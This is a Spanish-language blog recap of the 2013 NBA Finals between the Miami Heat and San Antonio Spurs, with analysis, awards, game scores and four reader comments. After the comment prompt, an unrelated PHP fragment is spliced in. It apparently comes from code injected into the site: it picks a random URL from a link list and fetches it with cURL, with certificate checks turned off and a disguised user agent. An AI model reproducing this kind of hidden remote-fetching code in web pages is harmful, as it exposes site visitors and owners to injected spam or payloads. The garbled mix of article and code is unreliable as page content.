Resumen Miami Heat 4 – San Antonio Spurs 3

23 de June de 2013 por TheDeerHunter

heat

Se acabó lo que se daba. Hasta dentro de casi 5 meses no volveremos a disfrutar de nuestro espectáculo favorito. Pero ahora mismo no podemos estar más satisfechos, más saciados, tras haber degustado unos Playoffs intensísimos y una final maravillosa. Una de las mejores de toda la historia de la competición. No exageramos.

ray3El mejor jugador del planeta contra la mejor franquicia de los últimos 15 años. El 4 veces MVP contra los tetracampeones. Baloncesto de la vieja escuela contra la ciencia-ficción aplicada a este deporte. Y con estas premisas, 7 duelos al máximo nivel de intensidad, de emoción, de talento, de alternativas, de subtramas… ¿Qué no ha tenido esta final? Highlights que se repasarán durante décadas, buzzer-beaters imposibles, récords batidos, incluso una entrega fantasma del anillo. Se trata de un clásico instantáneo sobre el que deberemos volver una y otra vez mientras exista la competición. Nosotros lo hemos vivido.

Los acontecimientos nos desbordan. Cualquier análisis sesudo que podamos plantear es una farsa. Se nos puede llenar la boca de lo inmensamente bueno que es LeBron, de su capacidad para involucrar a los suyos, de su tremenda ética de trabajo para mejorar año a año su tiro, de su disposición a adelantar por la derecha al más grande de todos los tiempos… ¿Pero qué diríamos con un tiro libre más que hubiera entrado? ¿O con un rebote ofensivo que nunca hubieran atrapado? Un triple que no hubieran acertado, una falta que se hubiera causado a tiempo, alguna otra decisión que se hubiera tomado de manera distinta… Ante una igualdad como ésta, la historia queda en manos del más puro azar, que también tiene su encanto.

Pero tratando de dejar de lado este axioma que escapa a nuestro alcance racional, tratemos de encontrar las claves de la ecuación que sí podemos identificar relativas a lo que indicamos en su día que podrían marcar el resultado final:

  • Al final Wade sí estuvo: Ahora sabemos que llegó incluso a tener que drenarse la rodilla para el partido decisivo, pero sobreponiéndose a sus problemas físicos ha sido nuevamente fundamental para este anillo. Para la retina, su resurgir en el 4º de la serie y la primera parte del último.
  • spursEl insuficiente daño interior de Spurs: Duncan sí marcó su territorio como no podía ser de otra manera, pero al final Popovich se vio obligado a inclinarse por small-ball a su alrededor. Alucinamos el día que le devolvía la titularidad a Ginóbili, pero ese día también perdieron parte de la iniciativa para terminar jugando más como los Heat que como sí mismos.
  • Parker controlado: Con él apareció otra eventualidad. Pasaba de hacer trizas la moral de sus rivales con su canastón ganador en el primero a sufrir problemas físicos que ponían en duda incluso su concurso. Desconocemos hasta qué punto influyeron a la hora de prácticamente hacerse invisible en el 7º de la serie.
  • La experiencia fue por barrios: Irregulares pero puntualmente decisivos tanto Allen como Manudo, como anticipamos. No esperábamos, sin embargo, determinados errores tácticos del maestro Popovich al final del 6º (que, curiosamente, cometió el mismo pecado que Vogel, al que también nombramos) y el increíble despliegue anotador de Battier cuando más falta le hacía a los suyos. Apuntemos también a este aspecto la debacle del ¿espejismo? Danny Green.
  • El insuficiente cum laude de Leonard: Extraordinario. Una auténtica maravilla su desempeño en esta final, con 21 añitos como si mentalmente tuviera los 37 de Duncan. Llegó a conseguir que LeBron pareciese humano.

PREMIOS

wade lebron

MVP: Creo que no puede discutir nadie que LeBron James es, con diferencia, el mejor jugador del mundo y uno de los 10 mejores de la historia. Efectivamente, está en condiciones de destronar a Jordan algún día… pero para eso aún tiene que comer algunas madalenas. De momento este año casi clava los números de la final del pasado. Monstruoso.

La sorpresa: Pensábamos que Wade iba a terminar claudicando durante esta final a sus problemas físicos. Todo lo contrario. Se dejó la piel y se jugó su integridad para alcanzar el objetivo. Salvó a los suyos en el momento que más estaban contra las cuerdas. Mucho más mérito del que parece.

La decepción: Tras unos primeros partidos casi paranormales desde la larga distancia, Danny Green se vino abajo en los dos últimos vitales. También esperábamos mucho más que un buen partido por parte de Ginóbili, excelente en el 5º y muy gris en los seis restantes.

El mayor esfuerzo en vano: Épico Tim Duncan, al que ya no esperábamos en este tipo de citas a sus 37 añitos. Ójala ésta no sea su última palabra.

spurs heatAsí lo contamos en TJNBA:

Game 1 (Spurs 92-88 Heat)

Game 2 (Spurs 84-103 Heat)

Game 3 (Heat 77-113 Spurs)

Game 4 (Heat 109-93 Spurs)

Game 5 (Heat 104-114 Spurs)

Game 6 (Spurs 100-103 Heat)

Game 7 (Spurs 88-95 Heat)

VÍDEO RESUMEN DE LAS FINALES

Comenta

4 comentarios a esta entrada

  1. jose_dantley dice:
    #1

    Pura historia, aunque solo hayan pasado unos días.

    El mejor resumen el que aparece al principio: La historia queda en manos del más puro azar.

      Citar

  2. Esteban dice:
    #2

    increible la serie q ha realizado san antonio, por q seamos sinceros si no se lesionaba westbrok, ellos no estarian en la final, eran un equipo muy muy inferior al del heat, en fisico y en recursos,
    y hablando de recursos, el heat demostro por q es campeon, fallo bosh es cierto, pero a lo largo de la serie sus multiples opciones prevalecieron, aparecio allen, aparecio battier, aparecio miller, aparecio andersen, aparecio haslem, aparecio wade, aparecio chalmers y todos ayudaron a lebron

    san antonio? parker y duncan, mas el aporte en apartados especificos de leonard y green, mas algun partido o momentos buenos de ginobili jugando con el corazon y poco poco mas

    thiago desaparecido, joshep ni conto, diaw a medias y neal como siempre depende como fuera la corriente se sumaba o se restaba

    un equipo infinitamente superior como el heat apenas pudo vencerlos, por q nunca vale mas el dicho, nunca subestimes el corazon de un campeon, san antonio jugo con el corazon, fisica y tecnicamente eran inferiores, pero estuvieron a 5 segundos de ser campeones

    lebron empieza a escribir paginas doradas en este deporte, todo haria suponer que un proximo anillo en 2014 es muy posible, tambien otro mvp de temporada lo que le dejaria ya a esta edad con 5 mvp de regular, 5 finales jugadas, 3 anillos y 3 mvp de finales, numeros que solo pueden asemejarse a los de jordan, wilt, magic o karem,

    grande entre los grandes

      Citar

  3. Ruxixón dice:
    #3

    No sé qué decirte Esteban,vale que se lesionó Westbrook pero mira como apretó San Antonio a Miami,dudo mucho que con el entrenador de Oklahoma estos hubieran llegado a estar donde estuvo San Antonio.

    Echando la vista atrás recuerdo cuando muchos fans Lakers daban palmadas con las orejas con el cruce con San Antonio -hablo de otros sitios,aquí todo el mundo fuisteis muy prudentes viendo el desequilibrio que había entre Pop vs Pringles sin Kobe mediante- ,que eran los más fáciles.

      Citar

  4. Futurman dice:
    #4

    Pero los Thunder hubiesen jugado más de 4 partidos con Spurs, y estos no estarían tan descansados.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>